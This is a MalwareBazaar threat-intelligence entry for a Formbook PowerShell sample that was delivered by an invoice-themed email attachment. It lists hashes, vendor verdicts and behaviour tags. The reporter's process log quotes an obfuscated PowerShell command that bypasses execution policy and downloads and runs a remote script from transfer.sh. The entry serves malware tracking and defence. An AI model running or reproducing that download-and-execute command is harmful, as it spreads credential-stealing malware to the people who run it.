MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Formbook


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments

SHA256 hash: 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11
SHA3-384 hash: 928e02c01732f7d31a4aadd625cfbfe5f3a8be77a2e68ca037584494d9ea55d2514ac735048ce2bab70e0f223fbe5d4a
SHA1 hash: d16de10e43cf8f07be14d13599a459fc3f9a83c7
MD5 hash: 1623e62971b6cbe70bf5dc56198ab4b6
humanhash: gee-september-oven-purple
File name:transfer.sh_get_9GqmOG_jramooooss.ps1
Download: download sample
Signature Formbook
File size:2'273 bytes
First seen:2022-04-03 12:06:58 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 48:tmq1543FrMYF3gNZE+KbyN1r60NkwKzwvHWuc7:tTorT4/lN1r9NTiyHrC
Threatray 531 similar samples on MalwareBazaar
TLSH T1F841D9DCD28F3894E2D88725E778BCCB954569ED3BE30341C70AA8041472987A9BE42D
Reporter c_APT_ure
Tags:exe powershell ps1 vbs


Avatar
c_APT_ure
--- mail attachments (spaces replaced with [_X]) ---
49e864fe28310b2adc782a975aaa5b67 ./Revised_Invoice_#03252022.iso
e0e7f44f32d0b3dabb08bd61a3b81f6a ./Revised_Invoice_#03252022.vbs

--- processes created ---
* pid="2660" / md5="979D74799EA6C8B8167869A68DF5204A" / parentpid="1452"
path="C:\Windows\System32\wscript.exe" / cmdline="C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Revised_Invoice_x2303252022.vbs'"
* pid="2688" / md5="92F44E405DB16AC55D97E3BFE3B132FA" / parentpid="2660"
path="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" / cmdline="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -exeCutiO BYpASS -C I`eX(n`EW-Ob`J`EcT nET`.weBCLi`ENt).DoWnloAdStRiNG('https://transfer.sh/get/9GqmOG/jramooooss.ps1') "

Intelligence


File Origin
# of uploads :
1
# of downloads :
530
Origin country :
n/a
Vendor Threat Intelligence
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
powershell powershell
Result
Verdict:
MALICIOUS
Details
Base64 Encoded URL
Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.
Threat name:
Script-PowerShell.Trojan.Heuristic
Status:
Malicious
First seen:
2022-03-25 19:26:19 UTC
File Type:
Text (PowerShell)
AV detection:
7 of 42 (16.67%)
Threat level:
  2/5
Result
Malware family:
n/a
Score:
  8/10
Tags:
n/a
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Blocklisted process makes network request
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Formbook

PowerShell (PS) ps1 389358ac51f2b51b2425cface223f89a56f7715262829c5731fe5a4da3d40a11

(this sample)

  
Delivery method
Distributed via e-mail attachment

Comments